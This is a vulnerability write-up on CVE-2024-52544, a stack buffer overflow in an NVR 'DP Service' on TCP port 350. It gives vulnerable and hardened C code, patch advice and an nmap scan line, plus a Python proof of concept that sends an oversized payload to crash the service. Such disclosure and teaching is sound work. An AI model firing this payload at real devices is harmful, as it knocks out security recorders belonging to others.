Summary:
A new vulnerability, CVE-2024-52544, was discovered in the DP Service running on TCP port 350. This flaw allows unauthenticated attackers to cause a stack-based buffer overflow, potentially leading to denial of service or remote code execution. The issue was fixed in firmware version 2.800.000000.8.R.20241111. Below, we break down the vulnerability, demonstrate exploitation, and provide important references.
What is CVE-2024-52544?
CVE-2024-52544 is a high-severity stack-based buffer overflow in the DP Service, a component of some video NVRs (Network Video Recorders) and related devices. Anyone who can reach TCP port 350 can send a malicious payload without authentication and corrupt the device's stack memory, which can crash the service or allow execution of attacker-supplied code.
Severity: HIGH
Attack Vector: Network
Privileges Required: None
User Interaction: None
Technical Details
The buffer overflow exists because the service does not properly check the length of incoming data before copying it into a fixed-size stack buffer.
Vulnerable code snippet (simplified for clarity)
// Pseudo-source example (simplified): the shape of the bug, not the vendor's exact code
#include <string.h>

void handle_message(char *data) {
    char buffer[1024];            // fixed-size stack buffer
    // UNSAFE: no check on the length of data before copying it
    strcpy(buffer, data);         // copies until the first NUL byte, however far that is
    // ... process buffer ...
}
If an attacker sends more data than the 1024-byte buffer can hold, strcpy writes past its end and overwrites adjacent stack memory, including saved registers and the saved return address. Uncontrolled, this crashes the service (denial of service); with carefully chosen bytes it can redirect execution to attacker-supplied code.
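To make the contrast concrete, here is an added example (not code from this page, and not the vendor's patch) that puts the vulnerable handler shape above next to a hardened version. The hardened handler's signature, the assumption that the caller passes the byte count the socket layer actually received (as recv() reports it), the BUFFER_SIZE constant, and the sample inputs are all assumptions made for this example; the real DP Service message framing is not documented here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUFFER_SIZE 1024   /* the fixed-size stack buffer from the snippet above */

/* Vulnerable shape from the page, kept here only for contrast. strcpy() copies
 * until the first NUL byte, so a 1200-byte run of 'A' overruns buffer[] and
 * overwrites whatever sits above it on the stack (saved registers, the saved
 * return address). Never call this with untrusted input. */
void handle_message_vulnerable(const char *data) {
    char buffer[BUFFER_SIZE];
    strcpy(buffer, data);           /* UNSAFE: no bound on the copy */
    /* ... process buffer ... */
}

/* Hardened handler (example design, assumed for this demo). It takes the byte
 * count actually received and refuses anything that does not fit in buffer[]
 * together with a terminating NUL. Rejecting is safer than silently truncating,
 * because truncation can change the meaning of a message.
 * Returns the number of bytes accepted, or -1 if the message was rejected. */
int handle_message_safe(const uint8_t *data, size_t len) {
    char buffer[BUFFER_SIZE];

    if (data == NULL || len >= sizeof buffer) {
        return -1;                  /* would not fit: drop the message */
    }
    memcpy(buffer, data, len);      /* bounded copy: at most 1023 bytes */
    buffer[len] = '\0';             /* always NUL-terminate before string handling */
    /* ... process buffer ... */
    return (int)len;
}

int main(void) {
    /* Constructed inputs for the demo: a benign 100-byte message and the
     * 1200-byte run of 'A' used by the proof-of-concept further down. */
    uint8_t benign[100];
    uint8_t oversized[1200];
    memset(benign, 'B', sizeof benign);
    memset(oversized, 'A', sizeof oversized);

    printf("benign, 100 bytes:     %d\n", handle_message_safe(benign, sizeof benign));
    printf("oversized, 1200 bytes: %d\n", handle_message_safe(oversized, sizeof oversized));
    printf("exactly 1024 bytes:    %d\n", handle_message_safe(oversized, BUFFER_SIZE));
    printf("1023 bytes:            %d\n", handle_message_safe(oversized, BUFFER_SIZE - 1));
    return 0;
}
```

Compile with `cc -Wall -o dp_demo dp_demo.c` and run it: the hardened handler accepts the 100-byte and 1023-byte inputs and returns -1 for 1024 and 1200 bytes, the two cases where strcpy() in the vulnerable version would already have written past the buffer.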
Step-by-step Exploit (Proof-of-Concept)
Disclaimer: For educational purposes only. Do not use against systems you do not own.
We'll use Python to send an oversized payload to TCP port 350.
import socket

TARGET_IP = "192.0.2.123"  # Replace with the target IP (placeholder from the documentation range)
TARGET_PORT = 350

payload = b"A" * 1200  # 1200 bytes, more than the 1024-byte stack buffer

# create_connection() opens a TCP connection; the timeout stops the script hanging on a filtered port
with socket.create_connection((TARGET_IP, TARGET_PORT), timeout=5) as s:
    s.sendall(payload)  # sendall() keeps sending until the whole payload has been written
print("Payload sent. If vulnerable, device may freeze or crash.")
What happens?
The 1200 bytes of "A" are copied into the 1024-byte stack buffer and the excess overwrites the stack above it. With a filler like this the service most likely crashes (denial of service); if the attacker controls the bytes that land on the saved return address, execution can be redirected to attacker-supplied code.
Advanced:
Crafting a working remote code execution exploit requires knowledge of the target's architecture, stack layout, and addresses. On embedded devices this is often feasible because mitigations such as stack canaries, ASLR, and non-executable stacks are frequently missing.
How to Fix
- Upgrade firmware: the patch is in firmware version 2.800.000000.8.R.20241111 (see the vendor advisory for the download).
- Disable the DP Service if it is not used.
- Do not expose TCP port 350 to untrusted networks. Use tools like nmap to find exposed hosts:
nmap -p 350 192.0.2.0/24
References
- CVE record on NVD
- Vendor advisory
- Stack-based buffer overflows explained (Wikipedia)
- Stack Buffer Overflow Exploitation (HackTricks)
CVE-2024-52544 is a serious vulnerability that allows remote, unauthenticated attackers to crash or even hijack devices over the network. Make sure your devices are up-to-date and not exposed to the public internet.
Stay Safe!
Timeline
Published on: 12/03/2024 18:15:15 UTC
Last modified on: 12/03/2024 21:15:07 UTC